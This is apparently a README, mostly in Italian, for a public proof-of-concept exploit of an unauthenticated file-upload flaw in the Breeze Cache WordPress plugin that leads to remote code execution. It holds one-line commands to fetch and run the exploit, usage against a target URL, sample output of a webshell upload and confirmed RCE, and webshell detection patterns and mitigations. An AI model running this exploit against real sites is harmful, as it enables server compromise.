
Exploit PoC per CVE-2026-3844, una critica vulnerabilità di caricamento file senza autenticazione nel plugin WordPress Breeze che porta a RCE.
Exploit PoC per CVE-2026-3844, una vulnerabilità critica di caricamento arbitrario di file non autenticato nel plugin WordPress Breeze che consente l'esecuzione di codice in remoto (RCE).
CVE-2026-3844 è una vulnerabilità CRITICA di caricamento arbitrario di file non autenticato nel plugin WordPress Breeze Cache (di Cloudways), che interessa tutte le versioni fino alla 2.4.4 inclusa.
Questo repository fornisce un exploit Proof of Concept (PoC) (CVE-2026-3844.py) per ricerche di sicurezza autorizzate, penetration testing e divulgazione responsabile.
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3
Il plugin Breeze Cache per WordPress recupera le immagini Gravatar remote e le salva localmente quando la funzionalità "Host Files Locally – Gravatars" è abilitata. La funzione vulnerabile fetch_gravatar_from_remote in class-breeze-cache-cronjobs.php (righe 89–119) non esegue alcuna validazione del tipo di file o dell'estensione sul contenuto remoto recuperato.
class-breeze-cache-cronjobs.php
└── fetch_gravatar_from_remote() ← ❌ No file type validation
└── Saves remote content directly to disk
└── Attacker controls → uploads .php webshell → RCE
Attacker (Unauthenticated)
│
▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
│
▼
Plugin fetches & saves the .php file without validation
│
▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
│
▼
Attacker accesses webshell → Full RCE achieved
Se sfruttata con successo, un attaccante può:
requests# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py
# Navigate into the directory
cd CVE-2026-3844
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
python3 CVE-2026-3844.py
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]
CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC
optional arguments:
-h, --help Show this help message and exit
-u URL, --url URL Target URL (e.g. https://target.com)
-t TIMEOUT Request timeout in seconds (default: 10)
-o OUTPUT Save webshell path to output file
-v, --verbose Enable verbose/debug output
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com
# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v
# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v
╔══════════════════════════════════════════════════════╗
║ CVE-2026-3844 | Breeze Cache WP RCE ║
║ Researcher: tausifzaman.online ║
╚══════════════════════════════════════════════════════╝
[*] Target : https://vulnerable-site.com
[*] CVE : CVE-2026-3844
[*] Plugin : Breeze Cache ≤ 2.4.4
[*] Type : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...
[+] Breeze Cache plugin detected!
[+] "Host Files Locally – Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!
[+] Command output (id):
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.
Aggiorna Breeze Cache alla versione 2.4.5 o successiva — questa è l'unica soluzione completa.
# WordPress CLI — update Breeze plugin immediately
wp plugin update breeze
.htaccess# Add to /wp-content/uploads/.htaccess and /wp-content/cache/.htaccess
<FilesMatch "\.php$">
deny from all
</FilesMatch>
# Find recently modified PHP files in wp-content (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls
# Search for common webshell indicators
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
/wp-content/breeze-cache/*.php# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log
# Check for unexpected PHP files in Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"
# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7
# Look for admin accounts created recently (run in wp-mysql)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;
Tausif Zaman
🌐 tausifzaman.online · 🐙 GitHub @tausifzaman
Ricercatore di sicurezza · Bug Bounty Hunter · Sviluppatore di strumenti
Android · Python · PHP · Sicurezza web · Penetration Testing
Questo repository e il codice di exploit in esso contenuto sono forniti esclusivamente a scopo educativo e per ricerche di sicurezza autorizzate.
Hackera eticamente. Segnala in modo responsabile. Rispetta la legge. 🛡️
| Campo | Dettagli |
|---|
| ID CVE | CVE-2026-3844 |
| Plugin | Breeze Cache (di Cloudways) |
| Versioni interessate | Tutte le versioni ≤ 2.4.4 |
| Versione patchata | Breeze 2.4.5+ |
| Tipo di vulnerabilità | CWE-434 — Caricamento senza restrizioni di file con tipo pericoloso |
| Punteggio CVSS v3.1 | 9.8 (CRITICA) |
| Punteggio CVSS v2.0 | 10.0 (CRITICA) |
| Vettore CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Vettore di attacco | Di rete (remoto) |
| Autenticazione richiesta | ❌ Nessuna — non autenticato |
| Condizione | L'opzione "Host Files Locally – Gravatars" deve essere abilitata (disabilitata per impostazione predefinita) |
| Impatto | Riservatezza: ALTA · Integrità: ALTA · Disponibilità: ALTA |
| Pubblicata | 2026-04-23 |
| Fonte | Wordfence / NVD / MITRE |
| PoC | Tausif Zaman |
| Fonte | Link |
|---|
| 🔗 NVD (NIST) | nvd.nist.gov/vuln/detail/CVE-2026-3844 |
| 🔗 MITRE CVE | cve.mitre.org – CVE-2026-3844 |
| 🔗 Wordfence Advisory | wordfence.com – Threat Intel |
| 🔗 WordPress Plugin Changelog | plugins.trac.wordpress.org/changeset/3511463/breeze |
| 🔗 Codice vulnerabile (L89) | class-breeze-cache-cronjobs.php#L89 |
| 🔗 Codice vulnerabile (L119) | class-breeze-cache-cronjobs.php#L119 |
| 🔗 GitHub Advisory | GHSA-c529-q7mw-hq6j |
| 🔗 Repository PoC | github.com/tausifzaman/CVE-2026-3844 |